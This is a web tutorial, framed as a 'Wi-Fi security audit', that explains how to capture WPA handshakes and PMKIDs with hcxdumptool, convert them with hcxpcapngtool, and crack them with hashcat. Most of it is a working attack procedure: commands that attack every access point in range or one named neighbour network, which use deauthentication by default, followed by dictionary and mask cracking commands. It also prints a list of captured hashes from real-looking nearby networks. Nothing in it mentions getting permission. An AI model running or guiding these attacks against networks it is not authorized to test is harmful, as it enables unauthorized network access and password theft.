Wi-Fi security audit with Hashcat and hcxdumptool

Table of contents

1. New Wi-Fi security audit guide

2. Up-to-date Wi-Fi security audit tools

3. Command summary for Wi-Fi security audit

4. Stop processes that might interfere with handshake and PMKID capturing

5. Manage with wireless network interfaces

6. Handshakes and PMKID capture

6.1 Attack all APs

6.2 Attack a specific AP

7. Convert captured data to hash

8. Password cracking


See the first part here: Wi-Fi security audit improved: new tools, hash, and techniques

New Wi-Fi security audit guide

4-Way Handshake and PMKID capturing (see “Hacking Wi-Fi without users”) remain the most versatile methods to hack the Wi-Fi password, working for all Access Points. Although for some Access Points there are faster methods that exploit vulnerabilities or use the accumulated database of vulnerable routers (“How to hack Wi-Fi”).

Let's consider a modern attack on capturing handshakes and PMKID (using the hcxdumptool tool), converting it to a new hash format (using hcxpcapngtool) and cracking it at maximum graphical card speeds (using Hashcat).

Up-to-date Wi-Fi security audit tools

This guide uses the following tools:

If any of these programs are not installed on your system, then follow the links above to install the tools on your distribution.

Command summary for Wi-Fi security audit

Here are the most important commands – in case you do not have time to read the article in full.

Network interface names:

hcxdumptool -I

A typical command for capturing data:

hcxdumptool -i INTERFACE -o ФАЙЛ.pcapng --active_beacon --enable_status=15

Captured wireless frames are saved to dumpfile.pcapng file. Convert this file to hashes:

hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng

A hash.hc22000 file with hashes will be created.

To view information about hashes, use the hcxhashtool utility:

hcxhashtool --info=stdout -i hash.hc22000

Dictionary attack:

hashcat -m 22000 -a 0 hash.hc22000 СЛОВАРЬ.txt

Mask attack example:

hashcat -m 22000 -a 3 hash.hc22000 ?d?d?d?d?d?d?d?d

Stop processes that might interfere with handshake and PMKID capturing

Wi-Fi network security audit can be divided into:

  • Online attack when the data necessary to decrypt the wireless network password is captured. During this period, you need to be close to the attacked Access Point, while it must be turned on. That is, as if “online”
  • and Offline attack when a password is brute-forced. At this time, you can be anywhere, and the Access Point can even be turned off – this will not affect the result of the attack

During the online stage, it is strongly recommended to stop services that may interfere with the operation of network interfaces:

sudo systemctl stop NetworkManager
sudo systemctl stop wpa_supplicant

After the capturing of handshakes and PMKID is complete, you can start NetworkManager again (wpa_supplicant will be started automatically):

sudo systemctl start NetworkManager

Manage wireless network interfaces

The hcxdumptool utility is a versatile utility for viewing the status and managing network interfaces, and for performing wireless attacks.

To display a list of wireless interfaces, use the command:

hcxdumptool -I

Sample output (yes, I have a collection of adapters based on various chipsets: Realtek, Atheros, Intel and Mediatek):

wlan interfaces:
c0b6f9daaf3e wlo1 (iwlwifi)
00c0ca96cfcb wlp0s20f0u2 (ath9k_htc) warning:spoofed MAC e20def45c3f8 detected
00c0ca900d9f wlp0s20f0u1 (rt2800usb) warning:spoofed MAC e2b48830044d detected
00c0cab026eb wlp0s20f0u5 (mt76x2u) warning:spoofed MAC 72fe786e01f0 detected

You can get the same result with the command:

iw dev

With the command like

sudo hcxdumptool -i INTERFACE -C

you can view the channels supported by the wireless adapter.

For instance:

sudo hcxdumptool -i wlp0s20f0u1 -C

You can display similar information with the command

iw list

The --check_driver option runs several tests to ensure that the driver supports all the necessary ioctl() system calls. The driver must support monitor mode and full package injection, otherwise hcxdumptool will not work properly:

sudo hcxdumptool -i INTERFACE --check_driver

For instance:

sudo hcxdumptool -i wlp0s20f0u1 --check_driver

The key lines in the output are:

driver tests passed...
all required ioctl() system calls are supported by driver

They mean that this wireless adapter is fully suitable for performing wireless attacks.

With the --check_injection option, you can run an antenna test and a wireless packet injection test to determine if the driver supports full packet injection.

The results of this test are unstable, because they depend on a number of factors: proximity to Access Points and signal quality, which, in turn, can change from certain interference.

Another way to check if packet injection is working to start the tool with the --do_rcascan option, the program will list Access Points within range and INJECTION-RATIO. To obtain results, it is recommended to run the program for at least 13 * 5 seconds (13 channels, by default, the listening time for each channel is 5 seconds):

sudo hcxdumptool -i INTERFACE --do_rcascan

For instance:

sudo hcxdumptool -i wlp0s20f0u1 --do_rcascan

Pay attention to the table header:

 BSSID        FREQ   CH RSSI BEACON RESPONSE ESSID  SCAN-FREQ: 2432 INJECTION-RATIO:  30% [18:59:25]

It has the value INJECTION-RATIO.

If the AP is within your reach, then you can proceed with the attack.

If using ioctl() for some reason is not possible with your wireless adapter, then you can put it into monitor mode in the usual way (the hcxdumptool author recommends this only as a last resort):

sudo ip link set <INTERFACE> down
sudo iw <INTERFACE> set monitor control
sudo ip link set <INTERFACE> up

Handshakes and PMKID capture

Attack all APs

A typical command for capturing data:

hcxdumptool -i INTERFACE -o FILE.pcapng --active_beacon --enable_status=15

In this command, FILE.pcapng is the file where the captured wireless frames will be saved.

Example of my command:

sudo hcxdumptool -i wlp0s20f0u2 -o dumpfile.pcapng --active_beacon --enable_status=15

The default channel switching time is 5 seconds. This is more suitable if you are on the move, that is, for mobile attacks. If you are located permanently and are not in a hurry, then the operating time on each channel can be increased, for example, up to two minutes (option -t SECONDS):

sudo hcxdumptool -i wlp0s20f0u2 -o dumpfile.pcapng --active_beacon --enable_status=15 -t 120

If you do not want your wireless adapter to emit any frames, then specify the --silent option. This will disable the Deauthentication attack, an attack on clients without an AP, but will make you invisible (for wireless activity monitoring devices).

By default, hcxdumptool automatically selects the channels on which it listens and captures data. With the -c NUMBER option you can choose to set the frequency (2437,2462,5600,…) or the channel (1,2,3,…). Default: auto frequency/auto range. Maximum number of entries: 255. Values between 0-1000 are treated as channels and values >1000 are treated as frequency in MHz

On 5GHz and 6GHz it is recommended to use the frequency instead of the channel numbers since the channel numbers are not unique here. Standard 802.11 channels (device, driver and world regulatory domain dependent): https://en.wikipedia.org/wiki/List_of_WLAN_channels

With the -s NUMBER option you can set a predefined scan list, the following lists are available:

  • 0 = auto frequency/auto band (default)
  • 1 = 1,6,11,3,5,1,6,11,2,4,1,6,11,7,9,1,6,11,8,10,1,6,11,12,13 (optimized 2.4GHz)
  • 2 = 1,2,3,4,5,6,7,8,9,10,11,12,13 (standard 2.4 GHz)
  • 3 = 36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,144,149,153,157,161,165 (standard 5GHz)
  • 4 = 1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,144,149,153,157,161,165 (standard 2.4GHz/5GHz)

If you want to save the coordinates of the wireless Access Points / track your movement, then use the options:

--use_gps_device=DEVICE

  • use a GPS device such as /dev/ttyACM0, /dev/ttyUSB0, … (NMEA 0183 standard, fields $GPGGA $GPGGA)

--use_gpsd

use GPSD device (NMEA 0183 standard, $GPGGA $GPGGA fields)

--nmea=FILE

save track to file. Format: NMEA 0183 $GPGGA, $GPRMC, $GPWPL

See also: How to use Android phone as GPS sensor in Linux

An example of a program work log:

You can find an explanation of the terms in the “Abbreviations” section on the program page: https://en.kali.tools/?p=841.

Attack a specific AP

To attack a specific Access Point, assuming that you know its name (ESSID), you need to know the channel on which it operates and its MAC address (BSSID). This information can be collected by running hcxdumptool with the --do_rcascan option:

sudo hcxdumptool -i wlp0s20f0u2 --do_rcascan

Let's say I'm interested in an access point with the network name RT-728005:

BSSID        FREQ   CH RSSI BEACON RESPONSE ESSID  SCAN-FREQ: 2422 INJECTION-RATIO:  27% [12:51:31]
-----------------------------------------------------------------------------------------------------
…
…
 c891f9c7eff6 2412    1  113     47       34 RT-728005
…
…

You need to add options to the hcxdumptool command:

  • --filtermode=CHANNEL
  • --filterlist_ap=MAC_OR_FILE_WITH_MAC

For example, the RT-728005 AP that interests me works on the first channel and has BSSID c891f9c7eff6, then the command is as follows:

sudo hcxdumptool -i wlp0s20f0u2 -o RT-728005.pcapng --active_beacon --enable_status=15 --filtermode=2 --filterlist_ap=c891f9c7eff6 -c 1

Captured wireless frames are saved to file RT-728005.pcapng. Convert this file to hash:

hcxpcapngtool -o RT-728005.hc22000 -E wordlist RT-728005.pcapng

Viewing hash information:

hcxhashtool --info=stdout -i RT-728005.hc22000

This ends the online stage. Now you can start Network Manager again:

sudo systemctl start NetworkManager

Convert captured data to hash

To convert capture to the hash, use the following command:

hcxpcapngtool -o HASH.hc22000 -E WORDLIST CAPTURE_FILE.pcapng

In this command:

  • HASH.hc22000 is a file where all converted hashes will be placed
  • WORDLIST is a list of strings, including the names of the APs seen (ESSID), as well as strings transmitted in cleartext – sometimes you can see the Wi-Fi password here, some especially poorly designed devices can transmit it in plaintext
  • CAPTURE_FILE.pcapng is a file with wireless frames that we captured in the previous step

Command example:

hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng

The hash.hc22000 file will be created with hashes and statics of the captured data will be displayed:

Hashes example:

WPA*02*cf8d06ec4aeba37f5288e65ad802f5d3*10ae604c41e6*d4124342bd39*54502d4c696e6b5f303132365f455854*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c8d7a67dcf998fcc7e71de2b8fc076845c7fce4b04c7f1a52a67f03c2970bfc34000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*10
WPA*02*db391bf2742b8f862aa0656f4a3ab063*10ae604c41e7*b4fbe33717a0*616b3834*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c54c7c5c35fead373561cc26664649e6f6d3664765abdba3e1396442e3dbf7043000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*10
WPA*02*3d40af734bfaaaeb4649e0eab240a39e*10ae604c41e8*ee48b8e81589*54502d4c696e6b5f303132365f3547*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c93bb8236f147d14d1f562b4f59cf7b050dc4b76f6faa5fdd0aa9cc233b6b06b5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*10
WPA*02*efb03520bbd51818ff1bedd948633d0d*1c3bf3110126*28565a0ce1b1*54502d4c696e6b5f30313236*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c684d1db707cb77070f2f82f2e7dcc3d13588651a03283cd42e5ceab8dcc4ab57000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*10
WPA*02*4dd975abac76732237967a7751880a27*52ff20513c4c*b4fbe33717a0*616b3834*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53cab25d6ef96c3a0295c2849e02799b777f6aa88a0169d645547f4c72862d7092b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*10
WPA*02*f8021dd2fbac283ed9abbae33d507636*68ff7b2b33d0*420a96ef1527*54502d4c696e6b5f333343455f3547*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0203007502010a0010000000000000f53ceeaa8e20f3d31a31ed31b99431c72fff3b8a8b4568bdf09bc68b952742a484c9000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020c00*10
WPA*02*87ca0740cc9115d80092b4481ccd0f7f*68ff7b2b33d0*5e02e859bc68*54502d4c696e6b5f333343455f3547*71159d9a8e714aabb36f449f603bcc3a5b1d754c5ee756b314e4ee8e475e31fa*0103007502010a001000000000000000010335e9a1c1859746102aa540f063c6d2843ac8b6334b23aab61a1441564d4448000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020c00*02
WPA*02*2b25289c5d103de4455c605185f16799*68ff7b2b33d0*6e4138786697*54502d4c696e6b5f333343455f3547*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c0a63db353cb974e01b619ccb5a2505ed25df29630f9dab7ff09a6e7579095024000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac02ac24*10
WPA*01*472dca0f8d8fddc252c3eb15f8fe77ab*8c10d4c712b6*b0febd84cfaa*526f7374656c65636f6d5f433731324236***
WPA*01*784d7491048ba9d3fa68f64e294453cf*b09575bddc88*b0febd84cfaa*54502d4c696e6b5f444338365f3547***
WPA*01*b07fec80cc50c50aeddf66d599d24f2b*cc32e5b688f2*b0febd84cfaa*54502d4c696e6b5f383846305f3547***
WPA*01*8037d5a102f36040899b8c66f440c44b*e8018d3f4418*b0febd84cfaa*66685f336634343138***
WPA*02*2c68c0106fca98afb4ced71b9fc9d9c9*e848b8e81588*d4124342bd39*54502d4c696e6b5f303132365f455854*a736810c5a6dffb7317c1c88ca16afe6572762f186674e71879bcbb0c53e820b*0103007502010a00000000000000000001fbf958785389e5a6d68fd7446e2a0f4a858632bf4d103b73b66d6cc459622c0b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*02

The hash structure is as follows:

PROTOCOL*TYPE*PMKID/MIC*MACAP*MACCLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR

Where:

  • PROTOCOL = Fixed string "WPA"
  • TYPE = 01 for PMKID, 02 for EAPOL
  • PMKID/MIC = PMKID if TYPE=01, MIC if TYPE=02
  • MACAP = MAC of AP
  • MACCLIENT = MAC of CLIENT
  • ESSID = network name (ESSID) in HEX
  • ANONCE = ANONCE
  • EAPOL = EAPOL (SNONCE is in here)
  • MESSAGEPAIR = Bitmask:
  • 0: MP info (https://hashcat.net/wiki/doku.php?id=hccapx)
  • 1: MP info (https://hashcat.net/wiki/doku.php?id=hccapx)
  • 2: MP info (https://hashcat.net/wiki/doku.php?id=hccapx)
  • 3: x (unused)
  • 4: ap-less attack (set to 1) - no nonce-error-corrections necessary
  • 5: LE router detected (set to 1) - nonce-error-corrections only for LE necessary
  • 6: BE router detected (set to 1) - nonce-error-corrections only for BE necessary
  • 7: not replaycount checked (set to 1) - replaycount not checked, nonce-error-corrections definitely necessary

To view information about hashes, use the hcxhashtool utility:

hcxhashtool --info=stdout -i FILE.HASH

For instance:

hcxhashtool --info=stdout -i hash.hc22000

A list of hashes and their characteristics will be displayed.

hcxhashtool has a number of filters, the most useful of which are:

--essid=<ESSID>              : filter by ESSID
--essid-part=<part of ESSID> : filter by part of ESSID
--essid-list=<file>          : filter by ESSID file
--mac-skiplist=<file>        : exclude MAC from file
                               format: 001122334455, 00:11:22:33:44:55, 00-11-22-33-44-55 (hex)

For example, the following command will display information only about the AP named TP-Link_0126

hcxhashtool --info=stdout -i hash.hc22000 --essid=TP-Link_0126

If you want to extract a single hash, or exclude certain hashes, then use the filter (given above or from the full list https://en.kali.tools/?p=847#hcxhashtool of options), as well as the -o option, after which specify the file, in which the selected hashes should be stored:

hcxhashtool -i hash.hc22000 --essid=ak84 -o ak84.hc22000

If you want only one hash for each Access Point, then use the following construction:

cat hash.hc22000 | sort -t "*" -k 6,6 -u > hash.hc22000.uniq
hcxhashtool --info=stdout -i hash.hc22000.uniq

Password cracking

An example of launching a dictionary attack, hashes are stored in the hash.hc22000 file.

Downloading the dictionary:

wget https://wpa-sec.stanev.org/dict/cracked.txt.gz

Run brute force:

hashcat -m 22000 -a 0 hash.hc22000 cracked.txt.gz

Mask attack example:

hashcat -m 22000 -a 3 hash.hc22000 ?d?d?d?d?d?d?d?d

Options that might come in handy:

  • --hwmon-temp-abort=100
  • -d 1

Examples of my real commands:

hashcat --hwmon-temp-abort=100 -a 0 -m 22000 -d 1 RT-728005.hash rockyou_cleaned.txt
hashcat --hwmon-temp-abort=100 -a 3 -m 22000 -d 1 RT-728005.hash ?d?d?d?d?d?d?d?d

Recommended for you:

Leave a Reply

Your email address will not be published.